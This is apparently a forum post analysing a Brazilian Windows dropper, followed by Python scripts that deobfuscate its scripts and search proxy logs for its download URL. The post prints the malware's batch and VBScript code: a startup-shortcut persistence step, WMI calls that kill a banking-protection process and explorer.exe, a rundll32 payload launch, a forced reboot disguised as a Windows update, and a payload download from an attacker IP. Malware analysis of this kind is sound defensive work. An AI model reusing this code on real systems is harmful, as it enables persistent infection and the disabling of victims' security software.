echo set QQgIu3CAWkdYJ2X5 = So309D2GXyWt65iW8WL.CreateShortcut(ErAO7tz49) >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
echo QQgIu3CAWkdYJ2X5.TargetPath = "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs" >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
echo QQgIu3CAWkdYJ2X5.Save >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
cscript "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
DEL "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
DEL "C:\Users\fredd\AppData\Local\Temps\ngx2uq.vbs"
DEL "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg"
DEL "%LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip"
DEL "%LOCALAPPDATA%\Temps\kdbJe8gRfp.zip"
DEL "%LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip"
TIMEOUT 180 & Erase "%0" & shutdown -r -f -c "Atualizando Microsoft Windows Install."
m7hSw7Y2f.vbs :

On Error Resume Next
set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")
WScript.Sleep(90000)
xTsNBe0z1.Run("rundll32 C:\Users\DardiM\AppData\Local\Temps\tykeo13w.iqld,#2 VEi8sQm")

=> runs the tykeo13w.iqld (dll), entry point #2 argument VEi8sQm
RAj9WSg = "."
Set UPOfAz2RnR = GetObject("winmgmts:" &_
"{impersonationLevel=impersonate}!\\" & RAj9WSg & "\root\cimv2")
Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _
("Select * from Win32_Process Where Name = " &_
Chr(039)&Chr(103)&Chr(098)&Chr(112)&Chr(115)&Chr(118)&Chr(046)&Chr(101)&Chr(120)&Chr(101)&Chr(039))
=> searches for all occurrences of 'gbpsv.exe'
For Each gQ0GVRiRzf6e0 in h50KAQ29554T
gQ0GVRiRzf6e0.Terminate(1)

=> terminates the process
Next
Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _
("Select * from Win32_Process Where Name = " &_
Chr(039)&Chr(101)&Chr(120)&Chr(112)&Chr(108)&Chr(111)&Chr(114)&Chr(101)&Chr(114)&Chr(046) &_
Chr(101)&Chr(120)&Chr(101)&Chr(039))

=> searches for all occurrences of 'explorer.exe'

For Each gQ0GVRiRzf6e0 in h50KAQ29554T

gQ0GVRiRzf6e0.Terminate(1)
=> terminates the process
Next
xTsNBe0z1.Run "explorer.exe"

Set xTsNBe0z1 = Nothing
Wscript.exit
3) Conclusion :

- Arq-comprov.js is forced to run with elevated permission

- It creates :

  - UQv5OyjGx1f.bat
  - v5KT1ENIDUVo.bat
  - ngx2uq.vbs

- It runs :

  - UQv5OyjGx1f.bat

    - that downloads all the files needed
    - runs ngx2uq.vbs

  - ngx2uq.vbs

    - runs v5KT1ENIDUVo.bat

  - v5KT1ENIDUVo.bat

    - that extracts all the files needed
    - creates m7hSw7Y2f.vbs
    - creates yQoN9p28y.vbs
    - runs yQoN9p28y.vbs

      => creates the shortcut targeting m7hSw7Y2f.vbs in the start folder
    - reboots the pc

      => m7hSw7Y2f.vbs is run

      => rundll32 C:\Users\DardiM\AppData\Local\Temps\tykeo13w.iqld,#2 VEi8sQm
I would like to get the files downloaded (3 .zip files and one .dll as .jpg), and see what is extracted and used, but the links don't work anymore.

Only clues allow me to see :

downloaded :

kdbJe8gRfp.zip
n2x8Fb8oeJ.zip
U34B2X0Cwk5dk2lfzCJ.zip
h4zL4J4Nf6.jpg

=> h4zL4J4Nf6.jpg used as dll to extract the zip file content in "%WINDIR%"

=> InfDefaultInstall.exe %WINDIR%\setup.inf

After reboot :

m7hSw7Y2f.vbs is run :

=> it runs too : rundll32 C:\Users\DardiM\AppData\Local\Temps\tykeo13w.iqld,#2 VEi8sQm

A remark :

http://200.98.168.174/1/32/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/nyXRj/r0A850g.uIc %LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip

in a batch file %RANDOM% is a number from 0 to 32767

=> URLs are not hard coded

See the spoiler parts to see the content of each file used :)
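The three obfuscation layers described above (junk lines starting with "::" or "echo '", files built through echo redirection, and Chr() chains) can be undone mechanically. The Python below is an added example, not part of the original post or of the sample; its input is constructed in the style of the quoted batch lines (junk strings and the short names q and w are invented).

```python
import re

# Constructed input in the style of the batch lines quoted in the post (junk invented).
SAMPLE_BAT = r'''@echo off
::Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN
echo 'k8C4v6XOcP88lqV0SMRK26trbSo4eEsk >> %LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs
echo On Error Resume Next> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set q = w.ExecQuery _>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Chr(039)^&Chr(103)^&Chr(098)^&Chr(112)^&Chr(115)^&Chr(118)^&Chr(046)^&Chr(101)^&Chr(120)^&Chr(101)^&Chr(039))>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
TIMEOUT 5
'''

ECHO_REDIRECT = re.compile(r'^echo (.*?)(>>?) *"?([^">]+?)"?\s*$', re.I)
CHR_CHAIN = re.compile(r'Chr\(\d+\)(?:\s*&\s*Chr\(\d+\))*', re.I)

def strip_junk(bat_text):
    """Drop the filler lines the post describes: '::' comments and "echo '" writes."""
    return [l for l in bat_text.splitlines()
            if l.strip() and not l.lstrip().startswith(('::', "echo '"))]

def rebuild_dropped_files(lines):
    """Replay 'echo text> file' (create) and 'echo text>> file' (append) in memory."""
    files, rest = {}, []
    for line in lines:
        m = ECHO_REDIRECT.match(line)
        if not m:
            rest.append(line)
            continue
        text, op, path = m.groups()
        text = re.sub(r'\^(.)', r'\1', text)   # cmd.exe caret escapes: ^& -> &
        if op == '>':
            files[path] = []
        files.setdefault(path, []).append(text)
    return files, rest

def decode_vbs(lines):
    """Join '_' continuations and turn Chr(n)&Chr(n)... chains into string literals."""
    text = re.sub(r'(?<=[&\s])_[ \t]*\n', '', '\n'.join(lines))
    def to_literal(m):
        return '"' + ''.join(chr(int(n)) for n in re.findall(r'\d+', m.group(0))) + '"'
    return CHR_CHAIN.sub(to_literal, text)

def deobfuscate(bat_text):
    files, rest = rebuild_dropped_files(strip_junk(bat_text))
    return {path: decode_vbs(body) for path, body in files.items()}, rest

if __name__ == '__main__':
    print(deobfuscate(SAMPLE_BAT))
```

Nothing is executed or written to disk: the dropped script is reconstructed as text only, which is what makes the process names it targets readable.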
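Because %RANDOM% makes every download URL different, an exact-string indicator will not match proxy logs; the template has to become a pattern. The Python below is an added example, not part of the original post: the template is the one from the remark above, while the log lines, their five-field layout and the client addresses are constructed assumptions.

```python
import re

# Template taken from the "A remark" line of the post (download URL only).
TEMPLATE = ("http://200.98.168.174/1/32/%RANDOM%/%RANDOM%/%RANDOM%/"
            "%RANDOM%/%RANDOM%/%RANDOM%/nyXRj/r0A850g.uIc")

# Constructed proxy log lines: timestamp, client, method, URL, status.
SAMPLE_LOG = """\
2016-11-05T10:01:02 10.0.0.15 GET http://200.98.168.174/1/32/4711/12/32767/0/901/15000/nyXRj/r0A850g.uIc 200
2016-11-05T10:01:03 10.0.0.15 GET http://200.98.168.174/1/32/4711/12/40000/0/901/15000/nyXRj/r0A850g.uIc 200
2016-11-05T10:01:04 10.0.0.22 GET http://200.98.168.174/1/32/1/2/3/nyXRj/r0A850g.uIc 404
2016-11-05T10:01:05 10.0.0.22 GET http://example.com/index.html 200
"""

def template_to_regex(template):
    """Escape the fixed parts and put a capture group where cmd.exe expands %RANDOM%."""
    fixed = [re.escape(part) for part in template.split("%RANDOM%")]
    # %RANDOM% expands to a decimal number without leading zeros.
    return re.compile(r"(0|[1-9]\d{0,4})".join(fixed))

def matches_template(url, pattern):
    """True if the URL fits the template and every random field is within 0..32767."""
    m = pattern.fullmatch(url)
    return bool(m) and all(int(g) <= 32767 for g in m.groups())

def hunt(log_text, template=TEMPLATE):
    """Return (client, url) for each log line whose URL fits the template."""
    pattern = template_to_regex(template)
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) == 5 and matches_template(fields[3], pattern):
            hits.append((fields[1], fields[3]))
    return hits

if __name__ == "__main__":
    for client, url in hunt(SAMPLE_LOG):
        print(client, url)
```

The range check rejects the second constructed line (40000 is outside what %RANDOM% can produce), and the third fails because it has too few random segments.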
 